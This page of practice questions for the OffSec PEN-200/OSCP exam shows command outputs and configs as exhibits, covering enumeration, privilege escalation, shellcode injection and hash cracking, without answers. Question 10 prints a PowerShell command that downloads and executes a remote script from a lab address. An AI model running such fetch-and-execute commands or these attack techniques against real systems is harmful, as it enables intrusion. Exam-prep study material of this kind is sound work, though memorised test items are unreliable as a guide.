Courseiva
← Back to OffSec PEN-200 / OSCP Concepts questions

Scenario-based practice

Refer to the Exhibit Practice Questions

Practise OffSec PEN-200 / OSCP Concepts practice questions — original exam-style scenarios covering every exam domain, with detailed explanations, wrong-answer analysis, and common exam traps.

15
scenario questions
PEN-200
exam code
OffSec
vendor

Scenario guide

How to approach refer to the exhibit practice questions

Practise exhibit-style questions that ask you to read a topology, table, command output or diagram before choosing the best answer.

Quick answer

Exhibit-style questions test whether you can read a topology, command output, diagram or table before choosing the best answer.

How to extract the relevant detail from an exhibit.

How topology, command output or routing information affects the answer.

How to avoid answering from memory before reading the evidence.

How to map the exhibit back to the exam objective.

Related practice questions

Related PEN-200 topic practice pages

Scenario questions usually connect to one or more exam topics. Use these links to review the underlying concepts behind the scenario.

Practice set

Practice scenarios

Question 1mediummultiple choice
Full question →

Refer to the exhibit.

[!] Error compiling payload: Function 'VirtualAlloc' not found in target assembly scope.

An operator is writing a custom process injection loader in C# and encounters the compilation error shown above while attempting to allocate memory for shellcode. How should the operator properly resolve this issue to enable low-level memory allocation?

Question 2mediummultiple choice
Full question →

What is the most likely security risk associated with the configuration shown in the exhibit?

Exhibit

Refer to the exhibit: 
[Config File: .htaccess]
Options +Indexes
Question 3hardmultiple choice
Full question →

Refer to the exhibit.

```http HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'

<html> <body> <h1>Welcome</h1> <script>var token = '12345';</script> </body> </html> ```

Based on the HTTP response headers and body shown in the exhibit, what significant security risk is present regarding client-side attacks?

Question 4hardmultiple choice
Full question →

Refer to the exhibit. You are running a public exploit, but it fails with a 'Connection refused' error. What should you investigate first?

Exhibit

Error: [Errno 111] Connection refused
Target: 10.10.10.5:8080
Payload: reverse_tcp
Question 5hardmultiple choice
Full question →

Refer to the exhibit. If you attempt an SSH remote port forward (-R) to bind a port to all network interfaces on the server, what will happen?

Exhibit

sshd_config snippet:
AllowTcpForwarding yes
GatewayPorts no
X11Forwarding no
Question 6hardmultiple choice
Full question →

Refer to the exhibit. You identify an Apache 2.4.49 vulnerability and locate the exploit. After reviewing the exploit code, you realize it requires a specific input format to trigger the path traversal. What is the most effective way to verify the vulnerability without crashing the server?

Exhibit

searchsploit -w 'Apache' | grep '2.4.49'
[+] https://www.exploit-db.com/exploits/50383
Question 7mediummultiple choice
Full question →

Refer to the exhibit. An analyst observes this response header after a successful login. What is the security implication of the 'HttpOnly' and 'Secure' flags set on the 'session_id' cookie?

Exhibit

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: session_id=abc123xyz; HttpOnly; Secure

<html><body>Welcome, User!</body></html>
Question 8easymultiple choice
Full question →

Refer to the exhibit. Which ports are currently open on the target host 192.168.1.10?

Exhibit

Starting Nmap 7.91 ( https://nmap.org ) at 2023-10-27 10:00 UTC
Nmap scan report for 192.168.1.10
Host is up (0.001s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
Question 9mediummultiple choice
Full question →

Refer to the exhibit. What can you conclude about the security of this service binary?

Exhibit

C:\Users\admin> icacls "C:\Program Files\MyApp\service.exe"
C:\Program Files\MyApp\service.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
BUILTIN\Users:(M)
Question 10mediummultiple choice
Full question →

Refer to the exhibit. What is the most likely goal of this command execution in a privilege escalation context?

Exhibit

C:\Users\user> powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/privesc.ps1')"
Question 11mediummultiple choice
Full question →

Refer to the exhibit. You have scanned a target and obtained these results. Which step is most logical to perform next to effectively enumerate the web service?

Exhibit

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
Question 12mediummultiple choice
Full question →

Refer to the exhibit. The command failed to crack the NTLM hash despite using a comprehensive wordlist. What is the most likely reason for this result?

Exhibit

C:\> hashcat -m 1000 -a 0 hashes.txt wordlist.txt
hashcat (v6.2.6) starting...
* Device #1: NVIDIA GeForce RTX 3080, 10240/10240 MB, 68CU
* Kernel memory limit: 8192 MB
* Loaded 1 hash (NTLM)
* Started: Tue Oct 24 14:00:00 2023
* Stopped: Tue Oct 24 14:00:05 2023
* Status: Exhausted
Question 13mediummultiple choice
Full question →

Refer to the exhibit. As an attacker attempting to brute-force a web login, why is receiving this specific error message beneficial to your engagement?

Exhibit

ERROR: Login failed. Reason: Password complexity policy not met. Please provide a password with 1 special character and 1 number.
Question 14hardmultiple choice
Full question →

Given the exhibit, why might using the address 0x00401020 to overwrite EIP be ineffective for shellcode execution?

Exhibit

Refer to the exhibit: [ESP: 0x0012FF70] [EIP: 0x00401020] [Instruction: 0x00401020 - CALL [EAX]]
Question 15mediummultiple choice
Full question →

Refer to the exhibit. What is the primary vulnerability shown here?

Exhibit

C:\Users\admin> schtasks /query /v /fo csv | findstr /i "SYSTEM"
"\SystemTask","","Ready","12/12/2023 10:00:00","SYSTEM","C:\scripts\run.bat"

These PEN-200 practice questions are part of Courseiva's free OffSec certification practice question bank. Courseiva provides original exam-style PEN-200 questions with detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics.